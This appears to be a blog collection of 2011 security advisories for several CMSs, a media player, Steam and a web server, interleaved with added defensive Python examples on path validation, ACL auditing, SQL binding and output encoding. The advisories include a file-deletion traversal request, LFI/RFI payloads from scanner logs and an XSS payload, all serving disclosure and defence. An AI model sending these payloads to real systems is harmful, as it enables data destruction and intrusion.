Tugux CMS 1.2 (pid) Remote Arbitrary File Deletion Vulnerability

Input passed to the ‘pid’ parameter in administrator/delete_page_parse.php is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server via directory traversal sequences passed within the ‘pid’ parameter.

PoC:

------------------------------

POST /tugux/administrator/delete_page_parse.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 175
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="pid"

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../boot.ini
------x--

------------------------------
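The request above works because the value of 'pid' is used directly as a filesystem path. The following is an added example, written in Python rather than Tugux's PHP and not taken from the CMS, of how a delete handler keeps an identifier from ever becoming a path: the id is matched against an allow-list first, and the resolved file is then checked to lie inside the pages directory. The id format, the pages directory layout and the function names are assumptions for the example.

```python
import os
import re
import tempfile


class UnsafePathError(ValueError):
    """Raised when an identifier or path would reach outside the pages directory."""


# Page identifiers are an allow-list: letters, digits, '_' and '-', 1 to 64 chars.
# Assumed policy for this example; Tugux's own id format is not on the page.
PAGE_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")


def resolve_within(base_dir, relative):
    """Join relative onto base_dir and refuse the result if it escapes base_dir.

    realpath() follows symlinks and collapses '..', so the check runs on the
    final filesystem location, not on the attacker-controlled string.
    commonpath() is used instead of startswith() so that a sibling such as
    '.../pages-private' is not mistaken for a child of '.../pages'.
    """
    if "\x00" in relative:
        raise UnsafePathError("NUL byte in path component")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, relative))
    if os.path.commonpath([base, target]) != base:
        raise UnsafePathError(f"{relative!r} resolves outside {base}")
    return target


def delete_page(pages_dir, pid):
    """Hypothetical hardened delete handler: pid is an identifier, never a path."""
    if not PAGE_ID.fullmatch(pid):
        raise UnsafePathError(f"invalid page id {pid!r}")
    target = resolve_within(pages_dir, pid + ".html")
    if not os.path.isfile(target):
        raise FileNotFoundError(target)
    os.remove(target)
    return target


def demo():
    """Constructed scenario: one deletable page beside a file that must survive."""
    outcomes = {}
    with tempfile.TemporaryDirectory() as root:
        pages = os.path.join(root, "pages")
        os.mkdir(pages)
        open(os.path.join(pages, "about.html"), "w").close()
        protected = os.path.join(root, "config.ini")
        open(protected, "w").close()

        delete_page(pages, "about")
        outcomes["about"] = "deleted"

        # First layer: the identifier allow-list stops traversal before a path exists.
        for pid in ("../config", "..\\..\\config", "about\x00"):
            try:
                delete_page(pages, pid)
                outcomes[pid] = "deleted"
            except UnsafePathError:
                outcomes[pid] = "rejected by id check"

        # Second layer: containment, for code that genuinely has to accept a path.
        try:
            resolve_within(pages, "../config.ini")
            outcomes["../config.ini"] = "resolved"
        except UnsafePathError:
            outcomes["../config.ini"] = "rejected by containment check"

        outcomes["config.ini survives"] = os.path.exists(protected)
    return outcomes


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r}: {value}")
```

The two layers are independent on purpose: the allow-list is the real fix for a parameter that is only ever an id, while `resolve_within` is the check to keep for any handler that legitimately takes a relative path.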

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5024.php

ESTsoft ALPlayer 2.0 ASX Playlist File Handling Buffer Overflow Vulnerability

The vulnerability is caused by a boundary error in the processing of a playlist file, which can be exploited to cause a stack-based buffer overflow when a user opens e.g. a specially crafted .asx file. Successful exploitation may allow execution of arbitrary code.

-------------------------------------------------------------------------

(188.820): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0095c8e0 ebx=0012e560 ecx=00004141 edx=00ce4fc0 esi=026d1902 edi=0012e5ac
eip=7855c776 esp=0012e458 ebp=0012e468 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
MSVCR90!_isspace_l+0x3b:
7855c776 0fb70448 movzx eax,word ptr [eax+ecx*2] ds:0023:00964b62=????

-------------------------------------------------------------------------

PoC: alplayer_bof.rar
Advisory ID: ZSL-2011-5023
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5023.php

Valve Steam Client Application v1559/1559 Local Privilege Escalation

Steam is vulnerable to an elevation-of-privileges vulnerability that can be exploited by an ordinary user, who can replace the executable file with a binary of choice. The vulnerability exists due to improper permissions: the "F" flag (Full Control) is granted to the "Users" group on the binary files Steam.exe, GameOverlayUI.exe and steamerrorreporter.exe. The binary (Steam.exe) is set by default to run at Startup with the "-silent" parameter.

C:\Program Files\Steam>cacls Steam.exe
C:\Program Files\Steam\Steam.exe BUILTIN\Users:F <---
NT AUTHORITY\SYSTEM:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
LABPC\User101:F
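The cacls listing above is the whole finding: a group every local account belongs to can overwrite an executable that runs at startup. As an added example (not part of the advisory, and not a tool from Zero Science or Valve), here is detection logic in Python that parses output in that shape and flags ACEs granting write-capable rights to low-privilege principals. The sample listing is constructed from the lines above without the author's '<---' marker; the set of principals and rights treated as risky is this example's own choice.

```python
# Constructed from the cacls listing quoted above (same path and ACEs, without
# the author's '<---' marker). Not output captured from a live system.
STEAM_EXE = r"C:\Program Files\Steam\Steam.exe"
SAMPLE_CACLS = r"""C:\Program Files\Steam\Steam.exe BUILTIN\Users:F
                                  NT AUTHORITY\SYSTEM:F
                                  BUILTIN\Power Users:C
                                  BUILTIN\Administrators:F
                                  LABPC\User101:F
"""

# cacls letter codes that allow the file contents to be replaced:
# W (write), C (change) and F (full control).
WRITE_RIGHTS = {"W", "C", "F"}

# Principals that cover every interactive or authenticated account; none of
# them should be able to write a binary that other accounts or autostart run.
LOW_PRIV_PRINCIPALS = {
    r"BUILTIN\Users",
    "Everyone",
    r"NT AUTHORITY\Authenticated Users",
    r"NT AUTHORITY\INTERACTIVE",
}


def parse_cacls(output, path):
    """Return [(principal, rights)] from simple `cacls <path>` output.

    The first line starts with the queried path followed by the first ACE;
    later lines are indented ACEs. Only plain letter codes (N, R, W, C, F)
    are handled; '(special access:)' blocks are outside this example.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        if not line:
            continue
        principal, sep, rights = line.rpartition(":")
        if not sep:
            continue
        aces.append((principal.strip(), rights.strip()))
    return aces


def weak_aces(aces):
    """ACEs that let a low-privilege principal overwrite the binary."""
    return [(p, r) for p, r in aces if p in LOW_PRIV_PRINCIPALS and r in WRITE_RIGHTS]


def audit(output, path):
    """Convenience wrapper: parse then filter."""
    return weak_aces(parse_cacls(output, path))


if __name__ == "__main__":
    for principal, rights in audit(SAMPLE_CACLS, STEAM_EXE):
        print(f"WEAK: {principal} has {rights} on {STEAM_EXE}")
```

The Power Users:C entry is not flagged here because that group is not in the low-privilege set; in an environment where it is populated, add it. The remediation is the inverse of the finding: remove the write-capable ACE for Users so that only administrators and the installer can replace the binary.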

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5022.php

NetServe Web Server v1.0.58 Multiple Remote Vulnerabilities

NetServe Web Server is vulnerable to multiple issues including cross-site scripting, remote file inclusion, local file inclusion, script insertion, HTML injection, denial of service, etc. Although the software is no longer maintained and its last update was in 2006, a few sites still use it. All the parameters are susceptible to the above attacks. The parameters used by the web application (POST/GET) are:

- Action
- EnablePasswords
- _Checks
- _ValidationError
- ListIndex
- SiteList_0
- SSIErrorMessage
- SSIExtensions
- SSITimeFormat
- SSIabbrevSize
- EnableSSI
- LogCGIErrors
- LoggingInterval
- ExtendedLogging
- CGITimeOut

The tests were made using PowerFuzzer and OWASP ZAP. Attackers can exploit any of the issues using a web browser.

----snip----
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=http%3A%2F%2Fwww.google.com%2F&ListIndex=0&SiteList_0=DEFAULT
coming from http://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=%2Fetc%2Fpasswd&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming from http://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=%2Fetc%2Fpasswd&ListIndex=0&SiteList_0=DEFAULT
coming from http://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd&SiteList_0=DEFAULT
coming from http://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=%2Fetc%2Fpasswd
coming from http://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=%2Fetc%2Fpasswd%00&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming from http://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=%2Fetc%2Fpasswd%00&ListIndex=0&SiteList_0=DEFAULT
coming from http://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd%00&SiteList_0=DEFAULT
coming from http://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=%2Fetc%2Fpasswd%00
coming from http://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=c%3A%5C%5Cboot.ini&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming from http://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=c%3A%5C%5Cboot.ini&ListIndex=0&SiteList_0=DEFAULT
coming from http://127.0.0.1/admin/addindex.html
----snip----
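Scanner output in the shape above is tedious to triage by hand: each finding is a full query string in which exactly one parameter carries the probe. As an added example (Python; not part of the advisory, of NetServe, or of PowerFuzzer/ZAP), the code below parses findings in that shape, decodes each query string, diffs it against the form's normal values and names the inclusion technique each payload is probing for. The sample log is constructed from three of the lines above; the BASELINE values are the unmodified parameters visible in them.

```python
import re
from urllib.parse import parse_qsl

# Constructed excerpt: three findings copied from the scanner lines above.
SAMPLE_FINDINGS = """Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=http%3A%2F%2Fwww.google.com%2F&ListIndex=0&SiteList_0=DEFAULT
coming from http://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd%00&SiteList_0=DEFAULT
coming from http://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=c%3A%5C%5Cboot.ini&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming from http://127.0.0.1/admin/addindex.html
"""

# Normal values of the admin form, read off the unmodified parameters in the
# scanner output. A parameter that differs from its baseline holds the probe.
BASELINE = {
    "Action": "ListUpdate",
    "_ValidationError": "addsitelist.html",
    "ListIndex": "0",
    "SiteList_0": "DEFAULT",
}


def classify(payload):
    """Name the file-inclusion technique a decoded payload is probing for."""
    if "\x00" in payload:
        return "null-byte truncation"
    if re.match(r"^[a-z][a-z0-9+.-]*://", payload, re.I):
        return "remote url (RFI)"
    if re.match(r"^[a-z]:[\\/]", payload, re.I):
        return "windows absolute path (LFI)"
    if payload.startswith("/") or "../" in payload or "..\\" in payload:
        return "unix path / traversal (LFI)"
    return "other"


def triage(scanner_output):
    """Turn 'Remote include in ... / with params = ... / coming from ...' triples
    into (target, parameter, decoded payload, class) records.

    parse_qsl percent-decodes the values, so %00 becomes a real NUL byte and
    %2F becomes '/', which is what the server-side include would have seen.
    """
    findings = []
    target = None
    for line in scanner_output.splitlines():
        line = line.strip()
        if line.startswith("Remote include in "):
            target = line[len("Remote include in "):]
        elif line.startswith("with params =") and target:
            query = line[len("with params ="):]
            for name, value in parse_qsl(query, keep_blank_values=True):
                if BASELINE.get(name) != value:
                    findings.append((target, name, value, classify(value)))
    return findings


if __name__ == "__main__":
    for target, name, value, kind in triage(SAMPLE_FINDINGS):
        print(f"{kind:28} {name}={value!r}  ({target})")
```

Grouping the records by parameter and class gives the fix list directly: every parameter that accepts a path or URL needs an allow-list of expected values, and none of them should be passed to a file-open or include call at all.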

Advisory ID: ZSL-2011-5021
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5021.php

Sitemagic CMS 2010.04.17 (SMExt) Remote XSS Vulnerability

Sitemagic CMS suffers from an XSS vulnerability when parsing user input to the 'SMExt' parameter via GET method in 'index.php'. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session.

Vendor Status
[10.06.2011] Initial contact with the vendor.
[10.06.2011] Vendor replies asking more details.
[10.06.2011] Sent vulnerability details to vendor.
[11.06.2011] Vendor replies.
[12.06.2011] Vendor confirms vulnerability.
[15.06.2011] Asked vendor for scheduled patch release date.
[17.06.2011] No reply from vendor.
[18.06.2011] Sent another e-mail to vendor asking for scheduled patch release date, pointing out the reasonable timeframe for fixing an XSS issue.
[18.06.2011] Vendor says that they will keep me posted when a new release is available.
[20.06.2011] Informed the vendor that the advisory release will be on 21st of June.
[21.06.2011] Public security advisory released.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5020.php

5 Free Web Security Guides by Veracode

We would love to share these guides with the world: simple, detailed information about the most common web threats and their prevention, including mobile code security. Thanks Veracode ;)

  • SQL Injection: http://www.veracode.com/security/sql-injection
  • Cross Site Scripting: http://www.veracode.com/security/xss
  • Cross Site Request Forgery: http://www.veracode.com/security/csrf
  • LDAP Injection: http://www.veracode.com/security/ldap-injection
  • Mobile Code Security: http://www.veracode.com/security/mobile-code-security

Enjoy reading ;)

Multiple vulnerabilities in Pacer Edition CMS

Pacer Edition CMS suffers from multiple vulnerabilities including cross-site scripting, local file inclusion and arbitrary file deletion. You can view details of the issues on the following advisory links:

Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit [ZSL-2011-5017]
Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability [ZSL-2011-5018]
Pacer Edition CMS 2.1 (l param) Local File Inclusion Vulnerability [ZSL-2011-5019]

Vishuddha – Stardust

Ushahidi 2.0.1 (range param) SQL Injection Vulnerability (post-auth)

Input passed via the 'range' parameter to dashboard.php is not properly sanitised in application/controllers/admin/dashboard.php before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

--------------------------------------------------------------------------------

/application/controllers/admin/dashboard.php (lines 103-112)
----------------
// Set the date range (how many days in the past from today?)
// default to one year
$range = (isset($_GET['range'])) ? $_GET['range'] : 365;

if(isset($_GET['range']) AND $_GET['range'] == 0)
{
    $range = NULL;
}

$this->template->content->range = $range;

--------------------------------------------------------------------------------
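The snippet above takes 'range' straight from the query string and stores it for the query; the only treatment is the `== 0` comparison. As an added example (Python, not Ushahidi's PHP and not the project's code), the block below carries the two validation patterns from the vendor's patch through a safe version of that flow: the value is matched with fullmatch, converted to an integer, and only a computed date reaches the database as a bound parameter. It also shows the edge case that makes fullmatch matter: both PCRE and Python's `re` let `$` match just before a trailing newline. The `incident` table and its rows are constructed sample data.

```python
import re
import sqlite3
from datetime import date, timedelta

# The two patterns from the vendor's patch, transcribed into Python.
STRICT_RANGE = re.compile(r"[1-9]\d{0,2}")  # 1 to 999 days (the removed line)
LOOSE_RANGE = re.compile(r"\d+")            # any run of digits (the added line)


def parse_range(raw, pattern=LOOSE_RANGE, default=365):
    r"""Turn the untrusted 'range' value into an int, or fall back to the default.

    fullmatch() is used on purpose. Both PCRE and Python's re let '$' match
    just before a trailing newline, so a pattern written as '^\d+$' accepts
    "365\n" and would hand the unmodified string on to the query.
    A range of 0 keeps the original code's meaning: no limit, returned as None.
    """
    if raw is None or not pattern.fullmatch(raw):
        return default
    days = int(raw)
    return None if days == 0 else days


def dollar_anchor_gap(raw):
    """True when '^\\d+$' accepts raw but fullmatch('\\d+') rejects it."""
    return re.match(r"^\d+$", raw) is not None and LOOSE_RANGE.fullmatch(raw) is None


def count_incidents(conn, days, today):
    """Run the dashboard-style query with a bound parameter.

    The user value never becomes part of the SQL text; only a computed
    ISO date is passed for the '?', so there is nothing to break out of.
    """
    if days is None:
        return conn.execute("SELECT COUNT(*) FROM incident").fetchone()[0]
    since = (today - timedelta(days=days)).isoformat()
    row = conn.execute(
        "SELECT COUNT(*) FROM incident WHERE incident_date >= ?", (since,)
    ).fetchone()
    return row[0]


def build_sample_db():
    """Constructed data: eight incidents, 100 days apart, counting back from 2011-06-21."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE incident (id INTEGER PRIMARY KEY, incident_date TEXT)")
    today = date(2011, 6, 21)
    for i in range(8):
        when = (today - timedelta(days=100 * i)).isoformat()
        conn.execute("INSERT INTO incident (incident_date) VALUES (?)", (when,))
    return conn, today


if __name__ == "__main__":
    conn, today = build_sample_db()
    for raw in ("365", "0", "7\n", "' OR 1=1 --", "1000"):
        days = parse_range(raw)
        print(repr(raw), "->", days, "->", count_incidents(conn, days, today), "incidents")
```

Whether the stricter or the looser pattern is right depends on what the dashboard should accept; the part that removes the injection is that the validated value is an integer used to compute a date, and the date is bound rather than concatenated.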

Vendor releases patch:

    - $range = (isset($_GET['range']) AND preg_match(‘/^[1-9](\d{0,2})$/’, $_GET['range']) > 0)

    + $range = (isset($_GET['range']) AND preg_match(‘/^\d+$/’, $_GET['range']) > 0)
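Review bot: the regex on the `+` line, `/^\d+$/`, still accepts a value with a trailing newline, because PCRE's `$` also matches just before a final newline unless the `D` modifier is set or `\z` is used; `preg_match('/^\d+\z/', $_GET['range'])` closes that gap. Two smaller points on the same lines: the characters around both patterns are typographic quotes rather than ASCII single quotes, which PHP will not parse as string delimiters, and both lines stop after the `> 0` condition, so the value assigned when the check fails is not visible in this excerpt.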

Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5016.php

Vendor: http://dev.ushahidi.com/issues/show/2195
https://github.com/ushahidi/Ushahidi_Web/commit/5721b6a063bc3143a4562a78c8efb29a0f18b20b

be with zero worries :P

Kentico CMS 5.5R2.23 and below XSS POST Injection Vulnerability + Fix

Kentico CMS suffers from an XSS vulnerability when parsing user input to the 'userContextMenu_parameter' parameter via POST method in '/examples/webparts/membership/users-viewer.aspx'. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session.
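Both this Kentico issue and the Sitemagic 'SMExt' issue above are the same defect: a request parameter is echoed into the page without encoding for the context it lands in. As an added example (Python, independent of both products and of the advisories), the block below shows the echo pattern beside a version that encodes separately for the URL, attribute and element-body contexts, with a small check that tells the two apart. The payload string is constructed for the example and is not taken from either advisory.

```python
import html
from urllib.parse import quote

# Constructed reflected value of the kind a parameter such as SMExt or
# userContextMenu_parameter would carry. Not from the advisories.
PAYLOAD = '"><script>alert(1)</script>'


def render_unsafe(value):
    """The pattern both advisories describe: the parameter is echoed as-is.

    The value lands in two contexts at once (an href attribute and the link
    text), and the leading '">' closes the attribute so the script element
    becomes live markup.
    """
    return f'<a href="index.php?ext={value}">{value}</a>'


def render_safe(value):
    """Encode for each output context separately.

    - URL query component: percent-encode with no 'safe' characters, so
      quotes, '<', '>' and '&' cannot end the attribute or the URL.
    - HTML attribute value and element body: entity-encode with quote=True,
      so '"' becomes &quot; and cannot close the attribute.
    """
    in_url = quote(value, safe="")
    in_html = html.escape(value, quote=True)
    return f'<a href="index.php?ext={in_url}" title="{in_html}">{in_html}</a>'


def reflects_markup(rendered):
    """Detection helper: does the rendered fragment still contain a live script tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    for name, fn in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = fn(PAYLOAD)
        print(f"{name}: live script = {reflects_markup(out)}")
        print("   ", out)
```

The point of encoding per context rather than once is that a value that is harmless in one place (a percent-encoded URL component) can still break out of another (an unquoted or differently quoted attribute), which is why frameworks expose separate URL and HTML encoders.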

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5015.php

Vendor patch: http://devnet.kentico.com/Bugtracker/Hotfixes.aspx

t00t!